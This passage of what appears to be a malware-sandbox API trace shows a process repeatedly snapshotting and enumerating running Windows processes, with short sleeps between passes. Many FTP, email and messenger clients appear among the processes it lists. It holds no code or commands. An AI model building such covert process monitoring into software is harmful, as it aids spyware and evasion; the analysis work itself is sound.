pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.867] Sleep (dwMilliseconds=0x64) [0291.869] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.884] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.958] Sleep (dwMilliseconds=0x64) [0291.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.974] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.047] Sleep (dwMilliseconds=0x64) [0292.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0292.072] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.074] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.076] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.078] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.079] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.082] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.083] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.086] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.087] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.089] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.091] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.093] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.095] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.097] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.099] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.100] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.102] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.104] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.108] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.110] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.112] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.116] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.119] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.120] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.123] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.124] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.126] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0292.128] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0292.132] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.134] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.136] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.138] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.140] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.142] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.146] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.149] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.151] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.153] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.154] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0292.156] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0292.159] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0292.161] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0292.163] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0292.164] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0292.166] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0292.169] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0292.171] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0292.175] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0292.177] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0292.179] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0292.181] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0292.183] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0292.184] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0292.186] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0292.191] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0292.193] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0292.243] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0292.245] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.247] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.249] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.257] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.260] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.262] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.264] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.267] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0292.269] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.271] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.274] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.276] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.278] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.283] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.288] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.291] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.294] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.297] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.300] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.303] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.305] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.308] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.312] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.314] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.317] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, 